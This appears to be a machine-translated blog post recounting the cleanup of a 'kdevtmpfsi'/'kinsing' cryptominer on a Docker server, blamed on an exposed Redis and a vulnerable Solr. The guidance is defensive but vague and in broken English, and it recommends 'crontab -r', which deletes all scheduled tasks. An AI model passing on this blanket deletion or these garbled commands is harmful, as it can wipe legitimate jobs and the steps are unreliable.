This morning found not open server card, then use the top command to see a lot, on cue, the server is mining, bringing a complete solution below!
First, the analysis of causes
I am a docker deployment environment used, docker ps look and found only opened three great because redis attacked
Check with the way jps command java process about whether to run, found a ( a few days ago with solr did not close )
To sum up the reasons: redis Ali cloud console myself just changed the port to release my own ip address in a few months so it is not no problem redis caused by solr is just forgot to change the address and port and restrict the release solr there are loopholes vulnerable to attack
Second, use the find command to find the process of location
the Find / -name kdevtmpfsi (this is the process name, the command takes a long time, please be patient during the execution, will be found)
After entering this directory to find, view subfolders, found that the presence of mining file, you first do not delete delete can not afford, you delete he would restart (due to the daemon)
Third, find a daemon mining program and kill it
Kinsing kill this daemon on the line
If delete daemon, then you delete trenching program, the daemon will always restart it
Fourth, delete files daemon
Fifth, delete all the files mining program
This will delete temporary files directory of light, all the way yes you can
Sixth, to kill the mining process
In order to this point, it has been found to kill it for a long time he would not restart
After a period of time and does not restart mining program, completed 90 percent of
Seven, the most important step to delete its regular tasks!
This step must be done, this is the regular tasks of mining, every certain period of time will restart, the problem may not be today had a two days he has restarted, so it is necessary
crontab - L View regular tasks
crontab -r Delete all scheduled tasks
This is the end to, solr indeed more loopholes, we must remember to change the port address and limit the release! ! !